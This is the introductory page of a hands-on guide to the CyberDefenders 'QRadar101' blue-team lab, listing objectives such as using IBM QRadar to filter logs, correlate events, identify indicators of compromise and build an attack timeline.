QRadar101 Lab Challenge

Hands-on Analysis & Investigation Guide

Objectives of the QRadar101 Lab Challenge

  • ✅ Get familiar with IBM QRadar as a SIEM tool.

  • 🔍 Practice filtering and analyzing logs to track attacker activity.

  • 🕵️‍♂️ Investigate a real attack scenario using QRadar's event logs and offenses.

  • 🧠 Improve skills in log correlation, event investigation, and IOC identification.

  • 💡 Learn how to extract useful insights and link logs to specific hosts, users, and malicious actions.

  • 📁 Build a clear timeline of the attack using available artifacts (e.g., process creation logs, Suricata alerts, HTTP payloads).

Based on CyberDefenders Blue Team CTF https://cyberdefenders.org/blueteam-ctf-challenges/qradar101/

Previous14. Capture the User FlagNextScenario and Instructions

Last updated